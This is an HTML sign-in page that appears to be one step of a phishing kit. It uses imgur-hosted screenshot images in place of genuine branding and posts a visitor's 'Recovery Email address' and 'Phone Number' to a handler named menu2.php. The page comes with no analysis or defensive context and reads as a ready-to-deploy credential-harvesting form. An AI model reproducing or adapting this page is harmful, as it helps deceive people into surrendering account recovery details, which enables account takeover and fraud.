
<!doctype html>
<html>
<head>
<title>Sign In</title>
<style>
body{
background-color:#EFEFEF;
 background-repeat:no-repeat;
   background-size:cover;
}
#backgroundimage{
position: absolute;
top:0px;
left:0px;
}
input{
  display: block;
  margin: 0;
  width: 208px;
  font-family: sans-serif;
  font-size: 12px;  
   padding: 12px;
  border: solid .5px #D3D5D5;


}
input[type=number]::-webkit-inner-spin-button, 
input[type=number]::-webkit-outer-spin-button { 
  -webkit-appearance: none; 
  margin: 0; 
}
input:focus {
    border: solid .5px #1fbc02;
}


input[type=submit] {
   display: block;
    margin: 0;
     width: 80px;
     height: 40px;
    font-family: sans-serif;
    font-size: 15px;
    font-weight: bold;
    color: white;
    background: #009FDB; 
    border:0 none;
   }

#backgroundimage1{
position: fixed;
bottom:0px;
left:0px;
}
</style>
</head>
<body>
<center><img id="backgroundimage" src="https://i.imgur.com/1xaSSlc.png"><br><br><br><br><br>


<img src="https://i.imgur.com/VW9ZyAf.png">
<br><br>
<form action="menu2.php" method="post">

  <br><br>


      <input type="email" name="email" placeholder=" Recovery Email address" required >

     <br>

      <input type="number" name="number" placeholder="Phone Number" required >
    <br>


</section>
<br>
    <input type="submit" name="submit" value="Submit"/>

</form>

<img id="backgroundimage1" src="https://i.imgur.com/Uzu5hAd.png">
<center>
</body>
</html>
